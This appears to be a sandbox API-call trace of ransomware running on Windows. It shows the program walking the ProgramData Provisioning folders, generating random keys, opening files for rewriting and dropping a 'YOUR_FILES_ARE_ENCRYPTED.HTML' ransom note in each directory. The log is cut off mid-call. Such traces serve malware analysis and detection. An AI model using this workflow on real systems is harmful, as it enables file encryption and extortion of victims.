[0107.168] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.168] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0107.168] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f1f13f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0f1f13f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0f1f13f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.168] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.168] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml") returned 100 [0107.169] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.169] lstrlenW (lpString=".xml") returned 4 [0107.169] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.169] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.169] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.173] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.173] CloseHandle (hObject=0x31c) returned 1 [0107.173] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.173] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.173] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned 85 [0107.173] GetProcessHeap () returned 0x600000 [0107.173] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.174] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" [0107.174] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*" [0107.174] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.175] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.175] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.175] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.175] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned 93 [0107.175] GetProcessHeap () returned 0x600000 [0107.175] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.176] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime" [0107.176] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*" [0107.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0107.177] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.177] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.177] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.177] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.177] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.177] lstrlenW (lpString=".provxml") returned 8 [0107.177] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.177] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0107.177] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.177] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0107.177] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0107.177] lstrlenW (lpString=".provxml") returned 8 [0107.177] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0107.177] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0 [0107.177] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.177] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.177] GetProcessHeap () returned 0x600000 [0107.177] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.179] WriteFile (in: hFile=0x314, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.179] CloseHandle (hObject=0x314) returned 1 [0107.180] GetProcessHeap () returned 0x600000 [0107.180] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.180] GetProcessHeap () returned 0x600000 [0107.180] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.181] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.181] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.181] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml") returned 97 [0107.181] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.181] lstrlenW (lpString=".xml") returned 4 [0107.181] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.181] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.181] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.181] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=313) returned 1 [0107.181] CloseHandle (hObject=0x314) returned 1 [0107.181] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.181] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.182] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.182] GetProcessHeap () returned 0x600000 [0107.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.182] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.182] WriteFile (in: hFile=0x31c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.183] CloseHandle (hObject=0x31c) returned 1 [0107.183] GetProcessHeap () returned 0x600000 [0107.183] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.183] GetProcessHeap () returned 0x600000 [0107.183] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.184] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.184] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.184] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.184] GetProcessHeap () returned 0x600000 [0107.184] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.185] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.185] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.186] CloseHandle (hObject=0x308) returned 1 [0107.186] GetProcessHeap () returned 0x600000 [0107.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.186] GetProcessHeap () returned 0x600000 [0107.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.187] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 1 [0107.187] StrStrIW (lpFirst="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.188] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned 80 [0107.188] GetProcessHeap () returned 0x600000 [0107.188] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.189] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" [0107.189] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*" [0107.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.190] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.190] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9d106f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xaa9d106f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaa9d106f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x6eb8, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0107.190] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.190] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned 99 [0107.190] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.190] lstrlenW (lpString=".xml") returned 4 [0107.190] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.190] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.191] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.191] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=28344) returned 1 [0107.191] GetProcessHeap () returned 0x600000 [0107.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0107.193] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E8") returned 2 [0107.193] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="17") returned 2 [0107.193] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="B9") returned 2 [0107.193] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="11") returned 2 [0107.193] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="CF") returned 2 [0107.193] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="4E") returned 2 [0107.193] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="9B") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="46") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="2C") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2F") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="3A") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A2") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="2D") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="C7") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="33") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F3") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="E5") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="64") returned 2 [0107.193] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="99") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="82") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="67") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="24") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="16") returned 2 [0107.194] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: 